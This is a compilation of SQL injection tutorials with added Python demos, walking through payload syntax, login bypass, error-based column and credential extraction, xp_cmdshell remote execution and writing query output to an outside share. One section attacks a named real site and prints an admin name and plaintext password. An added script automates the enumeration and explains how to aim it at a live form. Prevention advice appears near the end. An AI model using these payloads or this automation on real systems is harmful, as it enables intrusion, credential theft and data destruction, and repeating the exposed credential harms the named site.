SQL Injection Introduction

Published by: aiNey_ on Jan 11, 2011
Copyright: Attribution Non-commercial

http://www.binushacker.net/simple-sql-injection-tutorial.html

This information is for educational purposes only. Please use this information wisely.

You already know about SQL injection, right? If not, read the tutorial (I wrote one earlier). That one was the basic tutorial; this is the advanced one. It does not cover how to inject, but the various syntax we can use to inject a website (if it can be injected at all). Okay, let's begin.

SQL Injection Syntax

1. Commenting out. Used to terminate a query and bypass whatever follows it.
+ SQL Server
  Syntax: --
  Usage: DROP TABLE namatabel;--
+ MySQL
  Syntax: #  (MySQL also accepts --, but only with a space after the dashes)
  Usage: DROP TABLE namatabel;#
Real-life example:
* Username: admin'--
* Query that runs on the server: SELECT * FROM userlist WHERE username='admin'--' AND password='password';
This query gives you access as admin because everything after -- is ignored, so the password check never runs.

2. Inline comment. Used to find out the SQL server version or to bypass protection scripts (keyword filters).
+ SQL Server (MySQL too)
  Syntax: /*Comment*/
  Usage: DROP/*comment*/TABLE/**/namatabel
  or: SELECT/*avoid-spaces*/password/**/FROM/**/userlist
  or, as often shown: DR/**/OP/*bypass protection*/TABLE namatabel
  Note: a comment between tokens works because the parser treats it as whitespace; for the same reason a comment inside a keyword (DR/**/OP) is read as DR OP by current MySQL and SQL Server and does not parse. Check it against the target before relying on it.
+ MySQL (version detection)
  Syntax: /*!MYSQL Special SQL*/
  Usage: SELECT /*!32302 1/0,*/1 FROM namatabel
  Note: the SQL inside /*!32302 ... */ is executed only when the MySQL version is 3.23.02 or higher (the number in the comment); lower versions skip it, so the difference in behaviour tells you the version.

3. Stacked queries. Used to chain two queries in one request.
+ SQL Server
  Syntax: ;
  Usage: SELECT * FROM namatabel; DROP TABLE namatabel--
Note: whether the second statement runs depends on the client API as much as on the database. SQL Server through ADO/ODBC runs it; MySQL through PHP's mysql_query() or mysqli_query() refuses more than one statement per call (mysqli_multi_query() does not), so test it rather than assume it.

4. IF statement. This is the key to Blind SQL Injection, and is also useful for accurately testing something that is unclear.
+ SQL Server
  Syntax: IF condition true-part ELSE false-part
  Usage: IF (1=1) SELECT 'true' ELSE SELECT 'false'
+ MySQL
  Syntax: IF(condition,true-part,false-part)
  Usage: SELECT IF(1=1,'true','false')

5. String operations. Used to bypass protection (build a string without typing the filtered one).
+ SQL Server
  Syntax: +
  Usage: SELECT login + '-' + password FROM userlist
+ MySQL
  Syntax: ||
  Usage: SELECT login || '-' || password FROM userlist
  Note: || is concatenation only when the MySQL server runs in ANSI mode (PIPES_AS_CONCAT); otherwise it is logical OR. The portable way is CONCAT().
  Syntax: CONCAT(str1,str2,str3,...)
  Usage: SELECT CONCAT(login,password) FROM userlist

6. Union injection. Used to append the rows of another table to the result, with the requirement that both SELECTs return the same number of columns (and, on SQL Server, compatible types).
Syntax: UNION
Usage: ' UNION SELECT * FROM namatabel--
or: ' UNION ALL SELECT * FROM namatabel--
or: ' UNION SELECT kolom1,kolom2 FROM namatabel--
What happens in the query:
SELECT * FROM user WHERE id='1' UNION SELECT kolom1,kolom2 FROM namatabel--'
If the tables have a different number of columns, pad the shorter SELECT with null or 1 until the counts match:
' UNION SELECT 1,kolom1,kolom2 FROM namatabel--
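The catalogue above, run for real. This is an added example, not code from the binushacker tutorial: a deliberately vulnerable product search backed by an in-memory SQLite database (standing in for MySQL/SQL Server; the tables userlist and product and their rows are constructed) takes each payload and reports whether the engine accepted it. SQLite's dialect differs in exactly the places the list warns about, which is the point: # is not a comment, a comment inside a keyword breaks the keyword, and a stacked ; statement is refused by the client API before the database sees it.

```python
import sqlite3

# Added example, not code from the binushacker tutorial: the syntax items
# above fired at a deliberately vulnerable product search. SQLite stands in
# for MySQL / SQL Server; tables userlist and product and their rows are
# constructed.

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE userlist(login TEXT, password TEXT);
        INSERT INTO userlist VALUES ('admin', 's3cret'), ('bob', 'hunter2');
        CREATE TABLE product(name TEXT, pcategory TEXT);
        INSERT INTO product VALUES ('apple', 'food'), ('hammer', 'tools');
    """)
    return db

def search_vulnerable(db, category: str) -> list:
    """The bug under test: the category is pasted into the statement text."""
    sql = "SELECT name, pcategory FROM product WHERE pcategory='" + category + "'"
    return db.execute(sql).fetchall()

def try_payload(category: str) -> tuple:
    """Run one payload on a fresh database; ('ok', rows) or ('error', message)."""
    db = make_db()
    try:
        return "ok", search_vulnerable(db, category)
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return "error", str(exc)
    finally:
        db.close()

PAYLOADS = {
    # 1. commenting out: close the literal, then throw away the trailing quote
    "dash_comment":   "food' OR 1=1 --",
    "hash_comment":   "food' OR 1=1 #",          # MySQL only: SQLite and SQL Server choke on #
    # 2. inline comment: between tokens it is whitespace, inside a keyword it splits it
    "inline_between": "food'/**/OR/**/1=1/**/--",
    "inline_inside":  "food' O/**/R 1=1 --",     # the DR/**/OP trick, seen as "O R"
    # 3. stacked query: sqlite3.execute() refuses a second statement, as mysql_query() does
    "stacked":        "food'; DELETE FROM product; --",
    # 5. string building with || (ANSI concatenation)
    "concat":         "fo'||'od",
    # 6. UNION with matching column count, and padding with a literal
    "union":          "x' UNION SELECT login, password FROM userlist --",
    "union_pad":      "x' UNION SELECT login, 1 FROM userlist --",
}

def run_catalogue() -> dict:
    """name -> ('ok', rows) | ('error', message) for every payload above."""
    return {name: try_payload(p) for name, p in PAYLOADS.items()}

if __name__ == "__main__":
    for name, (status, detail) in run_catalogue().items():
        print(f"{name:15s} {status:5s} {detail}")
```

Each payload gets a fresh database so the stacked DELETE, if an API ever did run it, could not skew the later rows. To point this at MySQL or SQL Server, replace make_db() and the sqlite3 exception classes with the driver's own; the payload table stays the same.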

SQL Injection, step by step
http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articleid=7

/*********************************************************
 * SQL Injection, step by step
 * By D-and
 * Published: April 25, 2007
 * This tutorial is for educational use only.
 * No Warranty. Commercial use is prohibited.
 * Enjoy
 **********************************************************/

Lately, have you often heard the term "SQL Injection"? Do you know how dangerous this one bug is? Here we will present SQL Injection step by step.

Note: we will limit the discussion to SQL Injection on MS-SQL Server.

First step: we determine which hole can be injected by first walking around (enumerating) the site. We will take the site www.pln-wilkaltim.co.id as the example. There are two weaknesses on this site, namely:
1. The News table
2. The Admin table

We will find two ways of supplying parameters: through an input box, and through the URL.

We take the easiest first: the Admin table, through an input box. We look for the admin login box, and find it at www.pln-wilkaltim.co.id/sipm/admin/admin.asp

First step, to determine the table and field names: we inject the NIP box with the command (password anything, leave the branch alone):
' having 1=1--
Don't forget to write the single quote and the double minus (important). What those two marks mean, you can read in the SQL Injection tutorial on www.neoteker.or.id (see the earlier archive).

Then an error message will come out:
-------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.NOMOR' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------------------
Out comes our first field name!!!
Note the table name: T_ADMIN
Note the field name: NOMOR

Then we look for the names of the next fields. We inject in the NIP box (password anything):
' group by T_ADMIN.NOMOR having 1=1--
An error message will come out:
-------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.NIP' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------------------
That means this is our table name and second field. Note: T_ADMIN.NIP

Then we look for the third field:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
An error message will come out:
-------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.PASSWORD' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
-------------------
Note the third field: T_ADMIN.PASSWORD

Repeat the step above until we find the last field. The error messages that come out are the ones shown above, with table names that may differ from site to site. We confirm that we have the last field by injecting:

' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL having 1=1--
(note: the statement must be on one line, not cut)
-------------------
NIP atau Password atau Unit Anda salah !!  (Your NIP or Password or Unit is wrong !!)
-------------------
Success!!! We have found the last field: no column error any more, only the normal login failure.

List of columns (fields):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL

There is only one table for this authentication (namely T_ADMIN); this will ease the rest of our process.

Next step: we determine the type of each of those fields. We inject in the NIP box (pass anything):
' union select sum(NOMOR) from T_ADMIN--
The meaning of that query: we apply sum() before the server gets to check whether the number of columns in the two rowsets is the same. In plain language, we feed a column to sum(), which only accepts numeric types, so for a non-numeric column the error that comes out tells us the column's type; for a numeric column the server gets as far as the UNION column-count check instead.
Error message:
-------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
-------------------
Meaning column NOMOR is numeric.

Next we inject:
' union select sum(NIP) from T_ADMIN--
An error message will come out:
-------------------

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument.
/sipm/admin/dologin.asp, line 7
-------------------
Meaning column NIP is of type char.

We must repeat the command above for each following column, replacing nama_kolom in:
' union select sum(nama_kolom) from T_ADMIN--
with the next column name. We obtain 7 column types:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Next step: we look for the content of the password column for the admin user, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
Meaning: we select the smallest user name greater than 'a' and let the server try to convert it to an integer (the first column of the table, NOMOR, is numeric, so that is the type the UNION forces on our value). The six 1s mean we only care about the NAMA column and pad the other 6 columns so the column counts match.
An error message will come out:
-------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int.
/sipm/admin/dologin.asp, line 7
-------------------
You see: varchar value 'bill '. 'bill' is a user name from the NAMA column (the trailing space is char padding). Note that min(NAMA) where NAMA > 'a' returns the alphabetically first name, not the most recently inserted record; to walk the other names, repeat with where NAMA > 'bill'.

Next we inject:
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--
(note: must be on one line, not cut)
An error will come out:
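The walk above (HAVING, then GROUP BY growing by one column each round, then sum() per column) is mechanical, so here it is automated. This is an added example, not D-and's code: the target is a constructed stand-in for dologin.asp that answers with exactly the error strings quoted above for the T_ADMIN layout listed above; the login statement behind the form (SELECT * FROM T_ADMIN WHERE NIP='...' AND PASSWORD='...') is an assumption. Swap fake_dologin for a function that POSTs the NIP field and returns the response body to run it against a real form.

```python
import re

# Added example, not D-and's code: the HAVING / GROUP BY column walk and the
# sum() type probe from the tutorial, automated against a constructed stand-in
# for /sipm/admin/dologin.asp. Column list and types are the tutorial's T_ADMIN;
# the login statement behind the form is assumed to be
# SELECT * FROM T_ADMIN WHERE NIP='<nip>' AND PASSWORD='<pw>'.

ODBC = "[Microsoft][ODBC SQL Server Driver][SQL Server]"
TABLE = "T_ADMIN"
SCHEMA = {  # constructed: column -> type, in table order
    "NOMOR": "numeric", "NIP": "char", "PASSWORD": "nvarchar", "NAMA": "char",
    "KD_RANTING": "char", "ADDRESS": "nvarchar", "EMAIL": "char",
}
LOGIN_FAILED = "NIP atau Password atau Unit Anda salah !!"


def fake_dologin(nip: str) -> str:
    """Answer the injected NIP field the way SQL Server 2000 did in the write-up."""
    m = re.fullmatch(r"' group by (.+) having 1=1--", nip)
    if nip == "' having 1=1--" or m:
        grouped = set(m.group(1).split(",")) if m else set()
        for col in SCHEMA:  # first select-list column not covered by GROUP BY
            if f"{TABLE}.{col}" not in grouped:
                why = ("an aggregate function and there is no GROUP BY clause" if not grouped
                       else "either an aggregate function or the GROUP BY clause")
                return (f"{ODBC}Column '{TABLE}.{col}' is invalid in the select list "
                        f"because it is not contained in {why}.")
        return LOGIN_FAILED
    m = re.fullmatch(r"' union select sum\((\w+)\) from T_ADMIN--", nip)
    if m:
        kind = SCHEMA[m.group(1)]
        if kind == "numeric":  # sum() is fine, so the UNION column-count check fires instead
            return (f"{ODBC}All queries in an SQL statement containing a UNION operator "
                    "must have an equal number of expressions in their target lists.")
        return f"{ODBC}The sum or average aggregate operation cannot take a {kind} data type as an argument."
    return LOGIN_FAILED


COL_RE = re.compile(r"Column '(\w+)\.(\w+)' is invalid in the select list")
TYPE_RE = re.compile(r"cannot take a (\w+) data type")


def walk_columns(send) -> tuple:
    """' having 1=1--, then GROUP BY every column found so far, until no new column is named."""
    table, cols = None, []
    while True:
        payload = ("' having 1=1--" if not cols else
                   "' group by " + ",".join(f"{table}.{c}" for c in cols) + " having 1=1--")
        m = COL_RE.search(send(payload))
        if not m:
            return table, cols
        table, cols = m.group(1), cols + [m.group(2)]


def probe_types(send, table: str, cols: list) -> dict:
    """sum(col) in a UNION: numeric columns reach the count error, others name their type."""
    types = {}
    for c in cols:
        resp = send(f"' union select sum({c}) from {table}--")
        m = TYPE_RE.search(resp)
        types[c] = m.group(1) if m else ("numeric" if "equal number of expressions" in resp else "unknown")
    return types


def enumerate_table(send=fake_dologin) -> dict:
    table, cols = walk_columns(send)
    return {"table": table, "columns": cols, "types": probe_types(send, table, cols)}


if __name__ == "__main__":
    print(enumerate_table())
```

The loop stops on the first response that names no column, which on the real site is the ordinary "NIP atau Password atau Unit Anda salah" page; that is the same signal the tutorial uses by hand.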

-------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm@mpusk@u' to a column of data type int.
/sipm/admin/dologin.asp, line 7
-------------------
Meaning we succeeded!!! We got:
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

As for the branch name, fill it in yourself by trial and error. Or take the shortcut and inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN where NAMA ='bill'--
(note: must be on one line)

Now log in at www.pln-wilkaltim.co.id/sipm/admin/admin.asp with the account above. Glhodhak... Duarrrrrr... straight into the admin menu.
Remember: don't do any damage! Tell the admin!!!

The second hole is in the news section. Basically the news shown there is the content of yet another table, so it can still be injected!!! The difference is that we have to put the parameter in the URL. Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
There are parameters id, idm and idSM. After trying the injection, it turns out only the id parameter matters (CMIIW). We inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
An error message will come out:
--------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tb_news.NewsId' is invalid in the select list because it is not contained in an aggregate function and

there is no GROUP BY clause.
/dari_Media.asp, line 58
--------------------------
Meaning 'tb_news.NewsId' is our first table and column name. Repeat our steps above until we get:
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.Title => nvarchar
tb_news.review =>
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.EntryDate => datetime
tb_news.sumber => char
tb_news.dateagenda => datetime

Well, from here on it is your own task to develop your knowledge. You could insert news whose content you decide yourself. This is why this hole in MS-SQL Server is so dangerous. My guess is that the party names on the KPU site hacked by Shizoprenic were also in the tables of a database, so they too could be reached with this SQL Injection method.

******************************************************
FOR ADMINS & WEB PROGRAMMERS ONLY !!!
******************************************************
Commonly used prevention methods:
1. Filter the input entered by the user, especially single quotes (input validation). Better still, never build the statement from the input at all: use parameterised queries so that user data is never parsed as SQL.
2. Turn off or hide the error messages coming out of the running SQL Server.
3. Turn off standard facilities such as Stored Procedures and Extended Stored Procedures where possible.
4. Change "Startup and run SQL Server" to use a low-privilege user in the SQL Server Security tab.
5. Limit the length of input boxes (where possible) by limiting it in the program code; a beginner cracker will be puzzled for a moment when the input box cannot be injected with a long command. Treat this as an annoyance for the attacker, not a control: short payloads such as ' having 1=1-- fit in almost any field.

Well, that is about all I can tell. It is a picture of how insecure the internet world is. If you want to be safer: unplug your hard disk, unplug your network cable, unplug your disk drive, sell your computer!!! (Just kidding.)

References:
[+] sqlinjection.BlackAngels.it
[+] Advanced SQL Injection in SQL Server Applications (www.ngssoftware.com)
[+] SQL Injection Walkthrough (www.securiteam.com)

MySQL - SQL Injection Prevention
http://www.tizag.com/mysqlTutorial/mysql-php-sql-injection.php

If you have ever taken raw user input and inserted it into a MySQL database there's a chance that you have left yourself wide open for a security issue known as SQL Injection. This lesson will teach you how to help prevent this from happening and help you secure your scripts and MySQL statements.

What is SQL Injection
SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database.

SQL Injection Example
Below is a sample string that has been gathered from a normal user and a bad user trying to use SQL Injection. We asked the users for their login, which will be used to run a SELECT statement to get their information.

MySQL & PHP Code:
// a good user's name
$name = "timmy";
$query = "SELECT * FROM customers WHERE username = '$name'";

// user input that uses SQL Injection
$name_bad = "' OR 1'";

// our MySQL query builder, however, not a very safe one
$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";

// display what the new query will look like, with injection
echo "Normal: " . $query . "<br />";
echo "Injection: " . $query_bad;

Display:
Normal: SELECT * FROM customers WHERE username = 'timmy'
Injection: SELECT * FROM customers WHERE username = '' OR 1''

The normal query is no problem, as our MySQL statement will just select everything from customers that has a username equal to timmy. However, the injection attack has actually made our query behave differently than we intended. By using a single quote (') they have ended the string part of our MySQL query
• username = ' '
and then added on to our WHERE statement with an OR clause of 1 (always true).
• username = ' ' OR 1
This OR clause of 1 will always be true and so every single entry in the "customers" table would be selected by this statement!

Note on the example: as shown, the injected query ends in OR 1'' and MySQL rejects that as a syntax error, because the closing quote the application appends is left dangling. The form that actually runs is ' OR '1'='1 (which swallows the trailing quote) or ' OR 1-- (which comments it out; note the space after the dashes). The effect described, every row selected, is right.

More Serious SQL Injection Attacks
Although the above example displayed a situation where an attacker could possibly get access to a lot of information they shouldn't have, the attacks can be a lot worse. For example an attacker could empty out a table by executing a DELETE statement.

MySQL & PHP Code:
$name_evil = "'; DELETE FROM customers WHERE 1 or username = '";

// our MySQL query builder really should check for injection
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";

// the new evil injection query would include a DELETE statement
echo "Injection: " . $query_evil;

Display:
SELECT * FROM customers WHERE username = ''; DELETE FROM customers WHERE 1 or username = ''

If you were to run this query, then the injected DELETE statement would completely empty your "customers" table. (Through the legacy mysql_query() used in this lesson it would not, because that function refuses to execute more than one statement per call; the second statement does run under mysqli_multi_query() and under drivers that enable multiple statements, so the lesson stands.) Now that you know this is a problem, how can you prevent it?

Injection Prevention - mysql_real_escape_string()
Lucky for you, this problem has been known for a while and PHP has a specially-made function to prevent these attacks. All you need to do is use the mouthful of a function mysql_real_escape_string.

What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. Basically, it will replace those troublesome quotes (') a user might enter with a MySQL-safe substitute, an escaped quote \'.

Let's try out this function on our two previous injection attacks and see how it works.

MySQL & PHP Code:
//NOTE: you must be connected to the database to use this function!
// connect to MySQL

$name_bad = "' OR 1'";
$name_bad = mysql_real_escape_string($name_bad);
$query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";
echo "Escaped Bad Injection: <br />" . $query_bad . "<br />";

$name_evil = "'; DELETE FROM customers WHERE 1 or username = '";
$name_evil = mysql_real_escape_string($name_evil);
$query_evil = "SELECT * FROM customers WHERE username = '$name_evil'";
echo "Escaped Evil Injection: <br />" . $query_evil;

Display:
Escaped Bad Injection: SELECT * FROM customers WHERE username = '\' OR 1\''
Escaped Evil Injection: SELECT * FROM customers WHERE username = '\'; DELETE FROM customers WHERE 1 or username = \''

Notice that those evil quotes have been escaped with a backslash \, preventing the injection attack. Now all these queries will do is try to find a username that is just completely ridiculous:
• Bad: \' OR 1\'
• Evil: \'; DELETE FROM customers WHERE 1 or username = \'
And I don't think we have to worry about those silly usernames getting access to our MySQL database. So please do use the handy mysql_real_escape_string() function to help prevent SQL Injection attacks on your websites. You have no excuse not to use it after reading this lesson!

Two caveats the tizag lesson predates: mysql_real_escape_string() belongs to the mysql extension that was deprecated in PHP 5.5 and removed in PHP 7.0, and escaping only protects values that sit inside quotes; an unquoted numeric slot such as WHERE id = $id stays injectable however well the value is escaped. Prepared statements (mysqli or PDO) cover both cases and are the replacement.

SQL Injection Walkthrough
26 May 2002
http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Summary
The following article will try to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks.

Credit: The information has been provided by SK.

1.0 Introduction
When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patches his server, we have to turn to web hacking. SQL injection is one type of web hacking that requires nothing but port 80 and it might just work even if the admin is patch-happy. It attacks the web application (like ASP, JSP, PHP, CGI, etc) itself rather than the web server or services running in the OS.

This article does not introduce anything new; SQL injection has been widely written about and used in the wild. We wrote the article because we

would like to document some of our pen-tests using SQL injection and hope that it may be of some use to others. You may find a trick or two, but please check out "9.0 Where can I get more info?" for the people who truly deserve credit for developing many of the techniques in SQL injection.

1.1 What is SQL Injection?
It is a trick to inject an SQL query/command as input, possibly via web pages. Many web pages take parameters from the web user and make an SQL query to the database. Take for instance a user login: the web page takes a user name and password and makes an SQL query to the database to check whether the user has a valid name and password. With SQL Injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?
Any web browser.

2.0 What should you look for?
Try to look for pages that allow you to submit data, i.e. login page, search page, feedback, etc. Sometimes, HTML pages use the POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for the "FORM" tag in the HTML code. You may find something like this in some HTML code:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Everything between the <FORM> and </FORM> has potential parameters that might be useful (exploit-wise).

2.1 What if you can't find any page that takes input?
You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URLs that take parameters, like:
http://duck/index.asp?id=10

3.0 How do you test if it is vulnerable?
Start with the single quote trick. Input something like:
hi' or 1=1--
into the login, or password, or even the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
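What the single-quote trick does to the login query, as an added example rather than code from this walkthrough or from the tizag lesson above: the same lookup built by concatenation, by quote-escaping, and with a bound parameter, run against an in-memory SQLite table (customers, rows constructed). The escaping shown doubles single quotes, the standard-SQL form SQLite understands, standing in for mysql_real_escape_string's backslash form; the last two functions show the case escaping cannot cover, an unquoted numeric id.

```python
import sqlite3

# Added example (not tizag's PHP, not the walkthrough's ASP): one login lookup
# built three ways against an in-memory SQLite table. Table name 'customers'
# and its rows are constructed.

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE customers(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO customers VALUES (1, 'admin', 'N0tGuessable'), (2, 'timmy', 'timmy123');
    """)
    return db

def escape(s: str) -> str:
    """Quote doubling, the standard-SQL escape SQLite understands; it plays the
    role mysql_real_escape_string() plays for MySQL (which backslash-escapes)."""
    return s.replace("'", "''")

def login_concat(db, user: str, pw: str) -> list:
    """The bug: user input pasted straight into the statement."""
    sql = f"SELECT username FROM customers WHERE username='{user}' AND password='{pw}'"
    return sorted(r[0] for r in db.execute(sql))

def login_escaped(db, user: str, pw: str) -> list:
    """Escaping keeps the quote from closing the literal, so the payload stays data."""
    sql = f"SELECT username FROM customers WHERE username='{escape(user)}' AND password='{escape(pw)}'"
    return sorted(r[0] for r in db.execute(sql))

def login_param(db, user: str, pw: str) -> list:
    """Bound parameters: the statement is parsed before the values are seen."""
    sql = "SELECT username FROM customers WHERE username=? AND password=?"
    return sorted(r[0] for r in db.execute(sql, (user, pw)))

def profile_escaped(db, customer_id: str) -> list:
    """Where escaping cannot help: an unquoted numeric slot has no quote to escape."""
    sql = f"SELECT username FROM customers WHERE id={escape(customer_id)}"
    return sorted(r[0] for r in db.execute(sql))

def profile_param(db, customer_id: str) -> list:
    sql = "SELECT username FROM customers WHERE id=?"
    return sorted(r[0] for r in db.execute(sql, (customer_id,)))

def demo() -> dict:
    db = make_db()
    bypass = "hi' or 1=1--"
    out = {
        "concat":     login_concat(db, bypass, "anything"),   # every user comes back
        "escaped":    login_escaped(db, bypass, "anything"),  # nothing matches
        "param":      login_param(db, bypass, "anything"),    # nothing matches
        "id_escaped": profile_escaped(db, "2 or 1=1"),        # every user comes back
        "id_param":   profile_param(db, "2 or 1=1"),          # nothing matches
    }
    db.close()
    return out

if __name__ == "__main__":
    for name, users in demo().items():
        print(f"{name:11s} -> {users}")
```

The first result is the walkthrough's "login without any login name or password": the quote closes the literal, 1=1 is true for every row, and -- discards the password check. The id case is why escaping is not the general fix: the bound parameter is compared as a value, while the escaped string is still spliced into the grammar.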

- http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it on your hard disk, and modify the URL and hidden field accordingly. Example:
<FORM action=http://duck/Search/search.asp method=post>
<input type=hidden name=A value="hi' or 1=1--">
</FORM>
If luck is on your side, you will get logged in without any login name or password.

3.1 But why ' or 1=1--?
Let us look at another example of why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an ASP page that will link you to another page with the following URL:
http://duck/index.asp?category=food
In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):
v_cat = request("category")
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
set rs=conn.execute(sqlstr)
As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:
SELECT * FROM product WHERE PCategory='food'
The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

Now, assume that we change the URL into something like this:
http://duck/index.asp?category=food' or 1=1--
Now, our variable v_cat equals "food' or 1=1-- ", and if we substitute this in the SQL query, we will have:
SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now selects everything from the product table regardless of whether PCategory is equal to 'food' or not. The double dash "--" tells MS SQL Server to ignore the rest of the query, which gets rid of the last hanging single quote ('). Sometimes, it may be possible to replace the double dash with a single hash "#" (MySQL).

However, if it is not SQL Server, or you simply cannot ignore the rest of the query, you may also try
' or 'a'='a
The SQL query will now become:
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
It should return the same result.

Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

4.0 How do I get remote execution with SQL injection?
Being able to inject SQL commands usually means we can execute any SQL query at will. A default installation of MS SQL Server (2000, at the time of writing) runs as SYSTEM, which is equivalent to Administrator access in Windows; later versions ship with xp_cmdshell disabled and run the service under a low-privilege account, so expect this step to need more. We can use stored procedures like master..xp_cmdshell to perform remote execution:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try using a double quote (") if the single quote (') is not working.

The semicolon ends the current SQL query and thus allows you to start a new SQL command. To verify that the command executed successfully, you can listen for ICMP packets from 10.10.1.2 and check whether any packet arrives from the server:
#tcpdump icmp

If you do not get any ping request from the server, and get an error message indicating a permission error, it is possible that the administrator has limited the web user's access to these stored procedures.

5.0 How do I get the output of my SQL query?
It is possible to use sp_makewebtask to write your query into an HTML file:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"
But the target must be able to reach the folder "share" on 10.10.1.3, shared for Everyone.

6.0 How to get data from the database using ODBC error messages
We can use the information in the error messages produced by MS SQL Server to get almost any data we want. Take the following page for example:
http://duck/index.asp?id=10
We will try to UNION the integer '10' with another string from the database:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
The system table INFORMATION_SCHEMA.TABLES contains information on all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
This should return the first table name in the database. When we UNION this string value with the integer 10, MS SQL Server will try to convert the string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
The error message is nice enough to tell us the value that could not be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

To get the next table name, we can use the following query:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

We can also search for data using the LIKE keyword:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
